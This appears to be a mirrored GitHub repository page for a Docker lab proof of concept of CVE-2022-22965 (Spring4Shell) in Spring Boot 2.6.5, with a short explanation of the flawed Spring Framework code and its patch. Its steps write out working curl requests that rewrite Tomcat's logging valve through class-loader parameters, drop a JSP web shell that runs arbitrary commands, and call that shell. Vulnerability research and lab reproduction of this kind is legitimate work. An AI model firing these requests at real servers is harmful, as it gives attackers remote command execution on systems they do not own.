Giters

itsecurityco / CVE-2022-22965

Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Spring Boot CVE-2022-22965

Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5

Shell

πŸš€ Getting Started

  1. Download the distribution code from https://github.com/itsecurityco/CVE-2022-22965/archive/refs/heads/master.zip and unzip it.
  2. Run docker compose up --build to build and start the vulnerable application.
  3. Run curl -H "Accept: text/html;" "http://localhost:8080/demo/itsecurityco?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%63%6f%64%65%7d%69&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" to changes Tomcat config valve.
  4. Run curl -H "Accept: text/html;" -H "code: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(String.valueOf(1337))).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) { out.println(new String(b)); } %>" "http://localhost:8080/demo/x" to create the web shell.
  5. Open your browser and go to http://localhost:8080/shell.jsp?1337=id to start executing commands.

πŸ”Ž Patch revision

The source code for Spring Framework 5.3.17 (vulnerable) and Spring Framework 5.3.18 (patched) can be downloaded respectively from:

$ wget https://github.com/spring-projects/spring-framework/archive/refs/tags/v5.3.17.zip
$ wget https://github.com/spring-projects/spring-framework/archive/refs/tags/v5.3.18.zip

The vulnerability is found in the /spring-beans/src/main/java/org/springframework/beans/CachedIntrospectionResults.java file at line 290 where validation is applied for Class.getClassLoader() and getProtectionDomain() methods but not for ClassLoader, ProtectionDomain types and PropertyDescriptors names.

The difference between the vulnerable code and the patched code can be obtained with the command diff.

$ diff spring-framework-5.3.17/spring-beans/src/main/java/org/springframework/beans/CachedIntrospectionResults.java spring-framework-5.3.18/spring-beans/src/main/java/org/springframework/beans/CachedIntrospectionResults.java

Patch

Credits

  • Original research: @p1n93r
  • Thanks: @fmunoz

About

Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5

Languages

Language:Java 89.0%Language:Dockerfile 11.0%